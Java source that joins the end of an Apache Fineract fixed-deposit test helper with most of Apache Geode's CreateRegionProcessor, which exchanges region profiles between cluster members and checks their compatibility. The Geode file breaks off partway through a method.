// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getActivatedFixedDepositAccountAsJSON(final String activationDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("activatedOnDate", activationDate); String fixedDepositAccountActivateJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountActivateJson); return fixedDepositAccountActivateJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getCalculatedInterestForFixedDepositApplicationAsJSON() { final HashMap<String, String> map = new HashMap<>(); String fixedDepositAccountCalculatedInterestJson = new Gson().toJson(map); LOG.info(fixedDepositAccountCalculatedInterestJson); return fixedDepositAccountCalculatedInterestJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getCalculatedPrematureAmountForFixedDepositAccountAsJSON(final String closedOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("closedOnDate", closedOnDate); String fixedDepositAccountPrematureClosureJson = new Gson().toJson(map); LOG.info(fixedDepositAccountPrematureClosureJson); return fixedDepositAccountPrematureClosureJson; } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getPrematureCloseForFixedDepositAccountAsJSON(final String closedOnDate, final String closureType, final Integer toSavingsId) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("closedOnDate", closedOnDate); map.put("onAccountClosureId", closureType); if (toSavingsId != null) { map.put("toSavingsAccountId", toSavingsId); map.put("transferDescription", "Transferring To Savings Account"); } String fixedDepositAccountPrematureCloseJson = new Gson().toJson(map); LOG.info(fixedDepositAccountPrematureCloseJson); return fixedDepositAccountPrematureCloseJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String createFixedDepositOperationURL(final String command, final Integer fixedDepositAccountID) { return FIXED_DEPOSIT_ACCOUNT_URL + "/" + fixedDepositAccountID + "?command=" + command + "&" + Utils.TENANT_IDENTIFIER; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private Object performFixedDepositActions(final String postURLForFixedDeposit, final String jsonToBeSent, final String jsonAttributeToGetBack) { return Utils.performServerPost(this.requestSpec, this.responseSpec, postURLForFixedDeposit, jsonToBeSent, jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private HashMap performFixedDepositApplicationActions(final String postURLForFixedDepositAction, final String jsonToBeSent) { HashMap status = null; final HashMap response = Utils.performServerPost(this.requestSpec, this.responseSpec, postURLForFixedDepositAction, jsonToBeSent, CommonConstants.RESPONSE_CHANGES); if (response != null) { status = (HashMap) response.get("status"); } return status; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String createFixedDepositCalculateInterestURL(final String command, final Integer fixedDepositAccountID) { return FIXED_DEPOSIT_ACCOUNT_URL + "/" + fixedDepositAccountID + "?command=" + command + "&" + Utils.TENANT_IDENTIFIER; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static ArrayList retrieveAllFixedDepositAccounts(final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { LOG.info("-------------------- RETRIEVING ALL FIXED DEPOSIT ACCOUNTS ---------------------"); final ArrayList response = Utils.performServerGet(requestSpec, responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "?" 
+ Utils.TENANT_IDENTIFIER, ""); return response; } public FixedDepositAccountHelper withSubmittedOnDate(final String fixedDepositApplicationSubmittedDate) { this.submittedOnDate = fixedDepositApplicationSubmittedDate; return this; } public FixedDepositAccountHelper withNumberOfDaysPerYear(final String numberOfDaysPerYearTypeId) { this.interestCalculationDaysInYearType = numberOfDaysPerYearTypeId; return this; } public FixedDepositAccountHelper withInterestCalculationPeriodType(final String interestCalculationTypeId) { this.interestCalculationType = interestCalculationTypeId; return this; } public FixedDepositAccountHelper withInterestCompoundingPeriodType(final String interestCompoundingPeriodTypeId) { this.interestCompoundingPeriodType = interestCompoundingPeriodTypeId; return this; } public FixedDepositAccountHelper withInterestPostingPeriodType(final String interestPostingPeriodTypeId) { this.interestPostingPeriodType = interestPostingPeriodTypeId; return this; } public FixedDepositAccountHelper withSavings(final String savingsId) { this.savingsId = savingsId; return this; } public FixedDepositAccountHelper transferInterest(final boolean transferInterest) { this.transferInterest = transferInterest; return this; } public FixedDepositAccountHelper withLockinPeriodFrequency(final String lockingPeriodFrequencyType, final String lockinPeriodFrequency) { this.lockingPeriodFrequencyType = lockingPeriodFrequencyType; this.lockinPeriodFrequency = lockinPeriodFrequency; return this; } public FixedDepositAccountHelper withDepositPeriod(final String depositPeriod) { this.depositPeriod = depositPeriod; return this; } public FixedDepositAccountHelper withDepositAmount(final String depositAmount) { this.newDepositAmount = depositAmount; return this; } private String getDepositAmount() { if (this.newDepositAmount == null) { return DEPOSIT_AMOUNT; } return this.newDepositAmount; } public FixedDepositAccountHelper withMaturityInstructionId(Integer maturityInstructionId) { 
this.maturityInstructionId = maturityInstructionId; return this; } public FixedDepositAccountHelper withCharges(List<HashMap<String, String>> charges) { this.charges = charges; return this; } }
apache/geode
36,020
geode-core/src/main/java/org/apache/geode/internal/cache/CreateRegionProcessor.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.internal.cache; import static org.apache.geode.internal.cache.LocalRegion.InitializationLevel.ANY_INIT; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import org.apache.logging.log4j.Logger; import org.apache.geode.CancelException; import org.apache.geode.DataSerializer; import org.apache.geode.SystemFailure; import org.apache.geode.cache.DynamicRegionFactory; import org.apache.geode.cache.PartitionAttributes; import org.apache.geode.cache.RegionDestroyedException; import org.apache.geode.cache.Scope; import org.apache.geode.distributed.DistributedMember; import org.apache.geode.distributed.internal.ClusterDistributionManager; import org.apache.geode.distributed.internal.DistributionAdvisee; import org.apache.geode.distributed.internal.DistributionAdvisor; import org.apache.geode.distributed.internal.DistributionMessage; import org.apache.geode.distributed.internal.HighPriorityDistributionMessage; import org.apache.geode.distributed.internal.InternalDistributedSystem; import 
org.apache.geode.distributed.internal.MessageWithReply; import org.apache.geode.distributed.internal.ReplyException; import org.apache.geode.distributed.internal.ReplyMessage; import org.apache.geode.distributed.internal.ReplyProcessor21; import org.apache.geode.distributed.internal.membership.InternalDistributedMember; import org.apache.geode.internal.Assert; import org.apache.geode.internal.InternalDataSerializer; import org.apache.geode.internal.cache.CacheDistributionAdvisor.CacheProfile; import org.apache.geode.internal.cache.CacheDistributionAdvisor.InitialImageAdvice; import org.apache.geode.internal.cache.LocalRegion.InitializationLevel; import org.apache.geode.internal.cache.event.EventSequenceNumberHolder; import org.apache.geode.internal.cache.ha.ThreadIdentifier; import org.apache.geode.internal.cache.partitioned.Bucket; import org.apache.geode.internal.cache.partitioned.PRLocallyDestroyedException; import org.apache.geode.internal.cache.partitioned.RegionAdvisor; import org.apache.geode.internal.cache.partitioned.RegionAdvisor.PartitionProfile; import org.apache.geode.internal.cache.persistence.PersistentMemberID; import org.apache.geode.internal.serialization.DeserializationContext; import org.apache.geode.internal.serialization.SerializationContext; import org.apache.geode.logging.internal.log4j.api.LogService; /** * This message processor handles creation and initial exchange of * org.apache.geode.internal.cache.CacheDistributionAdvisor.Profiles. It represents creation of a * {@link CacheDistributionAdvisee}. Name remains CreateRegion to avoid merge conflicts. 
 */
public class CreateRegionProcessor implements ProfileExchangeProcessor {
  private static final Logger logger = LogService.getLogger();

  /** the region (or bucket) whose creation is being advertised to other members */
  protected CacheDistributionAdvisee newRegion;

  /** Creates a new instance of CreateRegionProcessor */
  public CreateRegionProcessor(CacheDistributionAdvisee newRegion) {
    this.newRegion = newRegion;
  }

  /** this method tells other members that the region is being created */
  @Override
  public void initializeRegion() {
    // NOTE(review): 'system' is never read in this method — candidate for removal
    InternalDistributedSystem system = newRegion.getSystem();
    // try 5 times, see CreateRegionMessage#skipDuringInitialization
    for (int retry = 0; retry < 5; retry++) {
      Set recps = getRecipients();

      if (logger.isDebugEnabled()) {
        logger.debug("Creating region {}", newRegion);
      }

      // no peers: mark the advisor and event tracker initialized and return early
      if (recps.isEmpty()) {
        if (logger.isDebugEnabled()) {
          logger.debug("CreateRegionProcessor.initializeRegion, no recipients, msg not sent");
        }
        newRegion.getDistributionAdvisor().setInitialized();
        ((LocalRegion) newRegion).getEventTracker().setInitialized();
        return;
      }

      CreateRegionReplyProcessor replyProc = new CreateRegionReplyProcessor(recps);
      newRegion.registerCreateRegionReplyProcessor(replyProc);

      boolean useMcast = false; // multicast is disabled for this message for now
      CreateRegionMessage msg = getCreateRegionMessage(recps, replyProc, useMcast);

      // since PR buckets can be created during cache entry operations, enable
      // severe alert processing if we're creating one of them
      if (((LocalRegion) newRegion).isUsedForPartitionedRegionBucket()) {
        replyProc.enableSevereAlertProcessing();
        msg.severeAlertCompatible = true;
      }

      newRegion.getDistributionManager().putOutgoing(msg);
      // this was in a while() loop, which is incorrect use of a reply processor.
      // Reply procs are deregistered when they return from waitForReplies
      try {
        // Don't allow a region to be created if the distributed system is
        // disconnecting
        newRegion.getCache().getCancelCriterion().checkCancelInProgress(null);

        // This isn't right. We should disable region creation in general, not just
        // the remote case here...
        //
        // Similarly, don't allow new regions to be created if the cache is closing
        try {
          replyProc.waitForRepliesUninterruptibly();
          // all peers answered with real compatibility checks — done; otherwise retry
          if (!replyProc.needRetry()) {
            break;
          }
        } catch (ReplyException e) {
          Throwable t = e.getCause();
          if (t instanceof IllegalStateException) {
            // region is incompatible with region in another cache
            throw (IllegalStateException) t;
          }
          e.handleCause();
          break;
        }
      } finally {
        // always clean up the reply processor and mark the event tracker initialized,
        // even when an exception propagates out of the wait above
        replyProc.cleanup();
        ((LocalRegion) newRegion).getEventTracker().setInitialized();
        if (((LocalRegion) newRegion).isUsedForPartitionedRegionBucket()) {
          if (logger.isDebugEnabled()) {
            logger.debug("initialized bucket event tracker: {}",
                ((LocalRegion) newRegion).getEventTracker());
          }
        }
      }
    } // end retry loop
    // tell advisor that it has been initialized since a profile exchange occurred
    newRegion.getDistributionAdvisor().setInitialized();
  }

  /**
   * Computes the set of members to send the CreateRegionMessage to: all other
   * distribution managers for a root region, otherwise the members advising the
   * parent region (see getAdvice()).
   */
  protected Set getRecipients() {
    DistributionAdvisee parent = newRegion.getParentAdvisee();
    Set recps = null;
    if (parent == null) { // root region, all recipients
      InternalDistributedSystem system = newRegion.getSystem();
      recps = system.getDistributionManager().getOtherDistributionManagerIds();
    } else {
      // get recipients that have the parent region defined as distributed.
      recps = getAdvice();
    }
    return recps;
  }

  @Override
  public InitialImageAdvice getInitialImageAdvice(InitialImageAdvice previousAdvice) {
    return newRegion.getCacheDistributionAdvisor().adviseInitialImage(previousAdvice);
  }

  /**
   * Members to exchange profiles with: the bucket advisor's picks for a bucket,
   * otherwise the generic advice of the parent region's advisor.
   */
  private Set getAdvice() {
    if (newRegion instanceof BucketRegion) {
      return ((Bucket) newRegion).getBucketAdvisor().adviseProfileExchange();
    } else {
      DistributionAdvisee rgn = newRegion.getParentAdvisee();
      DistributionAdvisor advisor = rgn.getDistributionAdvisor();
      return advisor.adviseGeneric();
    }
  }

  /**
   * Builds the CreateRegionMessage carrying this region's path, profile, processor id
   * and concurrency-checks setting to the given recipients.
   */
  protected CreateRegionMessage getCreateRegionMessage(Set recps, ReplyProcessor21 proc,
      boolean useMcast) {
    CreateRegionMessage msg = new CreateRegionMessage();
    msg.regionPath = newRegion.getFullPath();
    msg.profile = (CacheProfile) newRegion.getProfile();
    msg.processorId = proc.getProcessorId();
    msg.concurrencyChecksEnabled = newRegion.getAttributes().getConcurrencyChecksEnabled();
    msg.setMulticast(useMcast);
    msg.setRecipients(recps);
    return msg;
  }

  @Override
  public void setOnline(InternalDistributedMember target) {
    // nothing
  }

  /**
   * Collects CreateRegionReplyMessages from peers, applying each returned profile
   * (and bucket profiles / event state) to this member's advisor as replies arrive.
   */
  class CreateRegionReplyProcessor extends ReplyProcessor21 {

    CreateRegionReplyProcessor(Set members) {
      super((InternalDistributedSystem) newRegion.getCache()
          .getDistributedSystem(), members);
    }

    // event state received from each replying member, keyed by sender; used to
    // initialize the event tracker from the GII provider
    private final Map<DistributedMember, Map<ThreadIdentifier, EventSequenceNumberHolder>> remoteEventStates =
        new ConcurrentHashMap<>();

    // cleared as soon as one member performed real compatibility checks
    private boolean allMembersSkippedChecks = true;

    public Map<ThreadIdentifier, EventSequenceNumberHolder> getEventState(
        InternalDistributedMember provider) {
      return remoteEventStates.get(provider);
    }

    /**
     * true if all members skipped CreateRegionMessage#checkCompatibility(), in which case
     * CreateRegionMessage should be retried.
     */
    public boolean needRetry() {
      return allMembersSkippedChecks;
    }

    @SuppressWarnings("unchecked")
    @Override
    public void process(DistributionMessage msg) {
      Assert.assertTrue(msg instanceof CreateRegionReplyMessage,
          "CreateRegionProcessor is unable to process message of type " + msg.getClass());
      CreateRegionReplyMessage reply = (CreateRegionReplyMessage) msg;
      LocalRegion lr = (LocalRegion) newRegion;
      if (logger.isDebugEnabled()) {
        logger.debug("CreateRegionProcessor processing {}", msg);
      }
      try {
        if (reply.profile != null) {
          // a non-persistent region that does not generate version tags defers to a
          // persistent peer's versions
          if (newRegion instanceof DistributedRegion) {
            DistributedRegion dr = (DistributedRegion) newRegion;
            if (!dr.getDataPolicy().withPersistence() && reply.profile.isPersistent) {
              dr.setGeneratedVersionTag(false);
            }
          }
          if (CreateRegionMessage.isLocalAccessor(newRegion) && reply.profile.isPersistent) {
            lr.enableConcurrencyChecks();
          }
          CacheDistributionAdvisor cda = newRegion.getCacheDistributionAdvisor();
          cda.putProfile(reply.profile);
          if (reply.bucketProfiles != null) {
            RegionAdvisor ra = (RegionAdvisor) cda;
            ra.putBucketRegionProfiles(reply.bucketProfiles);
          }
          // Save all event states, need to initiate the event tracker from the GII provider
          if (reply.eventState != null) {
            remoteEventStates.put(reply.getSender(),
                (Map<ThreadIdentifier, EventSequenceNumberHolder>) reply.eventState);
          }
          if (lr.isUsedForPartitionedRegionBucket()) {
            ((BucketRegion) lr).updateEventSeqNum(reply.seqKeyForWan);
          }
          // Process any delta filter-profile messages received during profile
          // exchange.
          // The pending messages are queued in the local profile.
          FilterProfile remoteFP = reply.profile.filterProfile;
          if (remoteFP != null) {
            FilterProfile localFP = ((LocalRegion) newRegion).filterProfile;
            // localFP can be null and remoteFP not null when upgrading from 7.0.1.14 to 7.0.1.15
            if (localFP != null) {
              List messages = localFP.getQueuedFilterProfileMsgs(reply.getSender());
              // Thread init level is set since region is used during CQ registration.
              final InitializationLevel oldLevel =
                  LocalRegion.setThreadInitLevelRequirement(ANY_INIT);
              try {
                remoteFP.processQueuedFilterProfileMsgs(messages);
              } finally {
                LocalRegion.setThreadInitLevelRequirement(oldLevel);
                localFP.removeQueuedFilterProfileMsgs(reply.getSender());
              }
            }
          }
        }
        if (reply.destroyedId != null && newRegion instanceof DistributedRegion) {
          DistributedRegion dr = (DistributedRegion) newRegion;
          dr.getPersistenceAdvisor().removeMember(reply.destroyedId);
        }
        if (!reply.skippedCompatibilityChecks) {
          allMembersSkippedChecks = false;
        }
      } finally {
        // invoke super.process() even in case of exceptions (bug #41556)
        if (logger.isDebugEnabled()) {
          logger.debug("CreateRegionProcessor invoking super.process()");
        }
        super.process(msg);
      }
    }

    /**
     * IllegalStateException is an anticipated reply exception. Receiving multiple replies with this
     * exception is normal.
     */
    @Override
    protected boolean logMultipleExceptions() {
      return false;
    }
  }

  /**
   * Message announcing a new region to a peer; the receiver checks compatibility
   * against its own definition and replies with its profile.
   */
  public static class CreateRegionMessage extends HighPriorityDistributionMessage
      implements MessageWithReply {

    public boolean concurrencyChecksEnabled;
    protected String regionPath;
    protected CacheProfile profile;
    protected int processorId;

    // transient receiver-side state populated while processing; never serialized
    private transient boolean incompatible = false;
    private transient ReplyException replyException;
    private transient CacheProfile replyProfile;
    private transient ArrayList replyBucketProfiles;
    private transient Object eventState;
    protected transient boolean severeAlertCompatible;
    private transient boolean skippedCompatibilityChecks;

    @Override
    public int getProcessorId() {
      return processorId;
    }

    @Override
    public boolean isSevereAlertCompatible() {
      return severeAlertCompatible;
    }

    @Override
    public boolean sendViaUDP() {
      return true;
    }

    @Override
    protected void process(ClusterDistributionManager dm) {
      // Set thread local flag to allow entrance through initialization Latch
      final InitializationLevel oldLevel = LocalRegion.setThreadInitLevelRequirement(ANY_INIT);
      LocalRegion lclRgn = null;
      PersistentMemberID
          destroyedId = null;
      try {
        // get the region from the path, but do NOT wait on initialization,
        // otherwise we could have a distributed deadlock
        InternalCache cache = dm.getExistingCache();

        // Fix for bug 42051 - Discover any regions that are in the process
        // of being destroyed
        DistributedRegion destroyingRegion = cache.getRegionInDestroy(regionPath);
        if (destroyingRegion != null) {
          destroyedId = destroyingRegion.getPersistentID();
        }

        lclRgn = (LocalRegion) cache.getRegion(regionPath);

        if (lclRgn instanceof CacheDistributionAdvisee) {
          // bug 37604 - don't return a profile if this is a bucket and the owner
          // has been locally destroyed
          if (lclRgn.isUsedForPartitionedRegionBucket()) {
            if (!((BucketRegion) lclRgn).isPartitionedRegionOpen()) {
              if (logger.isDebugEnabled()) {
                logger.debug("<Partitioned Region Closed or Locally Destroyed> {}", this);
              }
              return;
            }
          }
          handleCacheDistributionAdvisee((CacheDistributionAdvisee) lclRgn, true);
        } else {
          if (lclRgn == null) {
            // check to see if a ProxyBucketRegion (not a true region) exists
            handleCacheDistributionAdvisee(
                PartitionedRegionHelper.getProxyBucketRegion(cache, regionPath), false);
          } else {
            if (logger.isDebugEnabled()) {
              logger.debug("<lclRgn scope is not distributed. Scope={}> {}",
                  lclRgn.getAttributes().getScope(), this);
            }
          }
        }
      } catch (PRLocallyDestroyedException ignore) {
        // expected races with destroy/shutdown: log at debug and still reply in finally
        if (logger.isDebugEnabled()) {
          logger.debug("<Region Locally Destroyed> {}", this);
        }
      } catch (RegionDestroyedException ignore) {
        if (logger.isDebugEnabled()) {
          logger.debug("<RegionDestroyed> {}", this);
        }
      } catch (CancelException ignore) {
        if (logger.isDebugEnabled()) {
          logger.debug("<CancelException> {}", this);
        }
      } catch (VirtualMachineError err) {
        SystemFailure.initiateFailure(err);
        // If this ever returns, rethrow the error. We're poisoned
        // now, so don't let this thread continue.
        throw err;
      } catch (Throwable t) {
        // Whenever you catch Error or Throwable, you must also
        // catch VirtualMachineError (see above). However, there is
        // _still_ a possibility that you are dealing with a cascading
        // error condition, so you also need to check to see if the JVM
        // is still usable:
        SystemFailure.checkFailure();
        if (replyException == null) {
          replyException = new ReplyException(t);
        } else {
          logger.warn(String.format("More than one exception thrown in %s", this), t);
        }
      } finally {
        // a reply is ALWAYS sent, even on failure, so the sender's reply processor
        // does not hang waiting for this member
        LocalRegion.setThreadInitLevelRequirement(oldLevel);
        CreateRegionReplyMessage replyMsg = new CreateRegionReplyMessage();
        replyMsg.profile = replyProfile;
        replyMsg.bucketProfiles = replyBucketProfiles;
        replyMsg.eventState = eventState;
        replyMsg.destroyedId = destroyedId;
        replyMsg.setProcessorId(processorId);
        replyMsg.setSender(dm.getId()); // for EventStateHelper.dataSerialize
        replyMsg.setRecipient(getSender());
        replyMsg.skippedCompatibilityChecks = skippedCompatibilityChecks;
        if (lclRgn != null && lclRgn.isUsedForPartitionedRegionBucket()) {
          replyMsg.seqKeyForWan = ((BucketRegion) lclRgn).getEventSeqNum().get();
        }
        if (replyException != null && !incompatible) {
          // no need to log the exception if it was caused by compatibility check
          if (logger.isDebugEnabled()) {
            logger.debug("While processing '{}', got exception, returning to sender", this,
                replyException);
          }
        }
        replyMsg.setException(replyException);
        dm.putOutgoing(replyMsg);
        if (lclRgn instanceof PartitionedRegion) {
          ((PartitionedRegion) lclRgn).sendIndexCreationMsg(getSender());
        }
      }
    }

    /**
     * Attempts to process this message with the specified <code>CacheDistributionAdvisee</code>.
     *
     * @param cda the CacheDistributionAdvisee to apply this profile to
     * @param isRealRegion true if CacheDistributionAdvisee is a real region
     */
    private void handleCacheDistributionAdvisee(CacheDistributionAdvisee cda,
        boolean isRealRegion) {
      if (cda == null) {
        // local region or proxy bucket region not found
        if (logger.isDebugEnabled()) {
          logger.debug("<lclRgn is null> {}", this); // matches old logging
        }
        return;
      }
      String errorMsg = null;
      if (isRealRegion) {
        // only check compatibility if this advisee is a real region
        errorMsg = checkCompatibility(cda, profile);
      }
      if (errorMsg != null) {
        incompatible = true;
        if (logger.isDebugEnabled()) {
          logger.debug("{} <replyProfile not set because errorMsg={}", this, errorMsg);
        }
        replyException = new ReplyException(new IllegalStateException(errorMsg));
      } else {
        if (isRealRegion) { // TODO do we need this if clause??
          // if the new member is persistent, turn on concurrency checks
          // fixes bug 45208
          if (isLocalAccessor(cda) && profile.isPersistent) {
            // #45934 need to set the generateVersionTag flag
            if (cda instanceof DistributedRegion) {
              DistributedRegion dr = (DistributedRegion) cda;
              if (!dr.getDataPolicy().withPersistence()) {
                dr.setGeneratedVersionTag(false);
              }
            }
            assert cda instanceof LocalRegion;
            LocalRegion lr = (LocalRegion) cda;
            lr.enableConcurrencyChecks();
          }
        }
        // #45934 don't add profile until the attributes are set correctly,
        // in particular enableConcurrencyChecks and generateVersionTag
        cda.getDistributionAdvisor().putProfile(profile);

        if (isRealRegion) {
          // only exchange profile if this advisee is a real region
          replyProfile = (CacheProfile) cda.getProfile();
          if (cda instanceof PartitionedRegion) {
            // partitioned region needs to also answer back all real bucket profiles
            PartitionedRegion pr = (PartitionedRegion) cda;
            replyBucketProfiles = pr.getRegionAdvisor().getBucketRegionProfiles();
          } else if (((LocalRegion) cda).isUsedForPartitionedRegionBucket()) {
            eventState = ((LocalRegion) cda).getEventState();
          }
        }
      }
    }
protected String checkCompatibility(CacheDistributionAdvisee rgn, CacheProfile profile) { Scope otherScope = rgn.getAttributes().getScope(); String result = null; // Verify both VMs are gateway-enabled or neither are. Note that since // this string is sent back to the caller, the 'other' and the 'my' // below are from the caller's point of view. final DistributedMember myId = rgn.getDistributionManager().getId(); boolean otherCCEnabled = rgn.getAttributes().getConcurrencyChecksEnabled(); boolean skipCheckForAccessor = skipCheckForAccessor(rgn, profile); boolean skipConcurrencyChecks = skipChecksForInternalRegion(rgn); boolean initializing = skipDuringInitialization(rgn); if (initializing) { skippedCompatibilityChecks = true; } if (!initializing && !skipCheckForAccessor && (rgn.getAttributes().getDataPolicy() .withPersistence() != profile.dataPolicy.withPersistence())) { // 45186: Do not allow a persistent replicate to be started if a // non-persistent replicate is running if (!rgn.getAttributes().getDataPolicy().withPersistence()) { result = String.format( "Cannot create region %s DataPolicy withPersistence=true because another cache (%s) has the same region DataPolicy withPersistence=false. 
Persistent members must be started before non-persistent members", regionPath, myId); skipConcurrencyChecks = true; } else { // make the new member turn on concurrency checks skipConcurrencyChecks = true; } } if (!initializing && !skipCheckForAccessor && !skipConcurrencyChecks && concurrencyChecksEnabled != otherCCEnabled) { result = String.format( "Cannot create region %s concurrency-checks-enabled=%s because another cache (%s) has the same region concurrency-checks-enabled=%s", regionPath, concurrencyChecksEnabled, myId, otherCCEnabled); } Set<String> otherGatewaySenderIds = ((LocalRegion) rgn).getGatewaySenderIds(); Set<String> myGatewaySenderIds = profile.gatewaySenderIds; if (!otherGatewaySenderIds.equals(myGatewaySenderIds)) { if (!rgn.getFullPath().contains(DynamicRegionFactory.DYNAMIC_REGION_LIST_NAME)) { result = String.format( "Cannot create Region %s with %s gateway sender ids because another cache has the same region defined with %s gateway sender ids", regionPath, myGatewaySenderIds, otherGatewaySenderIds); } } Set<String> otherAsynEventQueueIds = ((LocalRegion) rgn).getVisibleAsyncEventQueueIds(); Set<String> myAsyncEventQueueIds = profile.asyncEventQueueIds; if (!isLocalOrRemoteAccessor(rgn, profile) && !otherAsynEventQueueIds.equals(myAsyncEventQueueIds)) { result = String.format( "Cannot create Region %s with %s async event ids because another cache has the same region defined with %s async event ids", regionPath, myAsyncEventQueueIds, otherAsynEventQueueIds); } final PartitionAttributes pa = rgn.getAttributes().getPartitionAttributes(); if (pa == null && profile.isPartitioned) { result = String.format( "Cannot create PartitionedRegion %s because another cache (%s) has the same region defined as a non PartitionedRegion.", regionPath, myId); } else if (pa != null && !profile.isPartitioned) { result = String.format( "Cannot create the non PartitionedRegion %s because another cache (%s) has a Partitioned Region defined with the same name.", 
regionPath, myId); } else if (profile.scope.isDistributed() && otherScope.isDistributed()) { // This check is somewhat unnecessary as all Partitioned Regions should have the same scope // due to the fact that Partitioned Regions do no support scope. if (profile.scope != otherScope) { result = String.format( "Cannot create region %s with %s scope because another cache (%s) has same region with %s scope.", regionPath, profile.scope, myId, otherScope); } } final boolean otherIsOffHeap = rgn.getAttributes().getOffHeap(); boolean thisIsRemoteAccessor = !rgn.getAttributes().getDataPolicy().withStorage() || (pa != null && pa.getLocalMaxMemory() == 0); if (!isRemoteAccessor(profile) && !thisIsRemoteAccessor && profile.isOffHeap != otherIsOffHeap) { result = String.format( "Cannot create region %s with off-heap=%s because another cache (%s) has the same region with off-heap=%s.", regionPath, profile.isOffHeap, myId, otherIsOffHeap); } String cspResult = null; Map<String, CacheServiceProfile> myProfiles = ((LocalRegion) rgn).getCacheServiceProfiles(); // Iterate and compare the remote CacheServiceProfiles to the local ones for (CacheServiceProfile remoteProfile : profile.cacheServiceProfiles) { CacheServiceProfile localProfile = myProfiles.get(remoteProfile.getId()); if (localProfile == null) { cspResult = getMissingProfileMessage(remoteProfile, true); } else { cspResult = remoteProfile.checkCompatibility(rgn.getFullPath(), localProfile); } if (cspResult != null) { break; } } // If the comparison result is null, compare the local profiles to the remote ones. If there // are more local profiles than remote ones (meaning there are ones defined locally that are // not defined remotely), then compare those. This should produce an informative error message // (as opposed to returning something like 'the profiles don't match'). 
if (cspResult == null) { if (myProfiles.size() > profile.cacheServiceProfiles.size()) { for (CacheServiceProfile localProfile : myProfiles.values()) { if (!profile.cacheServiceProfiles.stream() .anyMatch(remoteProfile -> remoteProfile.getId().equals(localProfile.getId()))) { cspResult = getMissingProfileMessage(localProfile, false); break; } } } } // If the comparison result is not null, set the final result. // Note: Be careful not to overwrite the final result with null in case it has already been // set in a previous compatibility check. if (cspResult != null) { result = cspResult; } if (logger.isDebugEnabled()) { logger.debug("CreateRegionProcessor.checkCompatibility: this={}; other={}; result={}", rgn, profile, result); } return result; } protected String getMissingProfileMessage(CacheServiceProfile profile, boolean existsInThisMember) { return profile.getMissingProfileMessage(existsInThisMember); } /** * When many members are started concurrently, it is possible that an accessor or non-version * generating replicate receives CreateRegionMessage before it is initialized, thus preventing * persistent members from starting. We skip compatibilityChecks if the region is not * initialized, and let other members check compatibility. If all members skipCompatabilit * checks, then the CreateRegionMessage should be retried. fixes #45186 */ private boolean skipDuringInitialization(CacheDistributionAdvisee rgn) { boolean skip = false; if (rgn instanceof LocalRegion) { LocalRegion lr = (LocalRegion) rgn; if (!lr.isInitialized()) { Set recipients = new CreateRegionProcessor(rgn).getRecipients(); recipients.remove(getSender()); if (!recipients.isEmpty()) { skip = true; } } } return skip; } /** * For internal regions skip concurrency-checks-enabled checks, since we will set it to true * after profile exchange if required. 
     */
    private boolean skipChecksForInternalRegion(CacheDistributionAdvisee rgn) {
      boolean skip = false;
      if (rgn instanceof LocalRegion) {
        LocalRegion lr = (LocalRegion) rgn;
        skip = lr.isInternalRegion();
      }
      return skip;
    }

    /**
     * check for isLocalOrRemoteAccessor(CacheDistributionAdvisee, CacheProfile) and check if
     * DistributedRegion does not generate entry versions.
     */
    private boolean skipCheckForAccessor(CacheDistributionAdvisee rgn, CacheProfile profile) {
      boolean skip = false;
      if (rgn instanceof DistributedRegion) {
        DistributedRegion dr = (DistributedRegion) rgn;
